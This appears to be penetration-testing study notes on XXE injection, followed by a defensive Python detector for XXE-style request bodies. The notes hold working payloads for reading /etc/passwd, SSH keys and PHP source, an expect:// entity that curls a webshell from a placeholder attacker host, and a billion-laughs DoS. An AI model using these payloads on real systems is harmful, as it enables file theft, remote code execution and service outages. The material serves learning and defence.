Bypass XXE
Identification
- see which parameter is being reflected in the response.
- for us it's the email parameter
- note which elements are being displayed, so that we know which elements to inject into.
- In our example, the XML input in the HTTP request had no DTD declared within the XML data itself or referenced externally, so we added a new DTD before defining our entity. If a DOCTYPE was already declared in the XML request, we would just add the ENTITY element to it.

Reading Sensitive Files
/etc/passwd
.ssh/id_rsa
- chain with File Inclusion/Directory Traversal vulnerabilities
- Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.
Reading Source Code
For PHP web apps:
- If we include index.php or any other file directly, it doesn't work, because the file we are referencing is not in a proper XML format, so it fails to be referenced as an external XML entity.
- If a file contains some of XML's special characters (e.g. <, > or &), it would break the external entity reference and not be used for the reference. Furthermore, we cannot read any binary data, as it would also not conform to the XML format.
- Use PHP wrappers:
- base64-encoded output will not break our XML doc
<!DOCTYPE email [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
Remote Code Execution
- if we can read local files:
- try to steal SSH keys or utilize a hash-stealing trick in Windows apps
- if not, for a PHP app, we can use the PHP expect wrapper (expect://)

- Write a php webshell and start a python server
- Make the target curl/wget our php webshell.
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
- We replaced all spaces in the above XML code with $IFS, to avoid breaking the XML syntax. Furthermore, many other characters like |, >, and { may break the code, so we should avoid using them.
- Now we should see a request on our server once we run the XXE payload
- Note: The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work. This is why XXE is usually used to disclose sensitive local files and source code, which may reveal additional vulnerabilities or ways to gain code execution.
Other XXE Attacks:
- SSRF to enumerate locally open ports and access pages that might be restricted
- DoS via nested entity expansion
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY a0 "DOS" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<root>
<name></name>
<tel></tel>
<email>&a10;</email>
<message></message>
</root>
This attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference.
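As an added defender-side example (not part of these notes), a small Python triage function that flags the three payload shapes above in an incoming XML body: a DOCTYPE at all, an external entity and its URI scheme, and the estimated expansion size of internal entities, costed without ever expanding them. The sample bodies are constructed here to mirror the notes' payloads; the 100,000-character expansion threshold is an assumed tuning value.

```python
import re

# Constructed sample bodies shaped like the payloads in these notes (not captured traffic).
FILE_READ = ('<?xml version="1.0"?><!DOCTYPE email [<!ENTITY company SYSTEM '
             '"php://filter/convert.base64-encode/resource=index.php">]>'
             '<root><name></name><tel></tel><email>&company;</email><message></message></root>')
RCE = ('<?xml version="1.0"?><!DOCTYPE email [<!ENTITY company SYSTEM '
       '"expect://curl$IFS-O$IFS\'OUR_IP/shell.php\'">]><root><email>&company;</email></root>')
_defs = ['<!ENTITY a0 "DOS" >'] + ['<!ENTITY a%d "%s">' % (i, '&a%d;' % (i - 1) * 10) for i in range(1, 11)]
ENTITY_BOMB = '<?xml version="1.0"?><!DOCTYPE email [' + ''.join(_defs) + ']><root><email>&a10;</email></root>'
CLEAN = '<?xml version="1.0"?><root><name>x</name><tel></tel><email>a@b.c</email></root>'

# entity name, then one of: SYSTEM "uri" | PUBLIC "pubid" "uri" | "internal value"
ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+(?:SYSTEM\s+"([^"]*)"|PUBLIC\s+"[^"]*"\s+"([^"]*)"|"([^"]*)")', re.I)
ENTITY_REF_RE = re.compile(r'&(\w+);')


def expansion_size(entities, name, memo=None, stack=()):
    """Estimated expanded length of internal entity `name`, following nested references.
    Memoised, so a 10x10x... chain is costed in a few calls; a cycle is reported as unbounded."""
    if name in stack:
        return float('inf')
    memo = {} if memo is None else memo
    if name not in memo:
        value, size, pos = entities.get(name, ''), 0, 0
        for m in ENTITY_REF_RE.finditer(value):
            size += m.start() - pos + expansion_size(entities, m.group(1), memo, stack + (name,))
            pos = m.end()
        memo[name] = size + len(value) - pos
    return memo[name]


def xxe_indicators(body, max_expansion=100_000):
    """Triage one XML request body; returns [] when nothing XXE-like is present."""
    findings = []
    if re.search(r'<!DOCTYPE', body, re.I):
        findings.append('doctype')          # user-supplied XML rarely has a legitimate reason to carry a DTD
    internal = {}
    for name, sys_uri, pub_uri, value in ENTITY_RE.findall(body):
        uri = sys_uri or pub_uri
        if uri:                             # external entity: record the scheme (php, expect, file, ...)
            scheme = uri.split(':', 1)[0].lower() if ':' in uri else 'relative'
            findings.append(f'external-entity:{name}:{scheme}')
        else:
            internal[name] = value
    for name in internal:                   # internal entities: flag anything that would blow up on expansion
        size = expansion_size(internal, name)
        if size > max_expansion:
            findings.append(f'entity-expansion:{name}:{size:.0f}')
    return findings


if __name__ == '__main__':
    for label, body in [('file read', FILE_READ), ('rce', RCE), ('bomb', ENTITY_BOMB), ('clean', CLEAN)]:
        print(label, xxe_indicators(body))
```

Rejecting any body that yields a non-empty list (or, simpler still, any body containing a DOCTYPE) at the edge is a reasonable first control, alongside disabling DTD and external entity resolution in the parser itself.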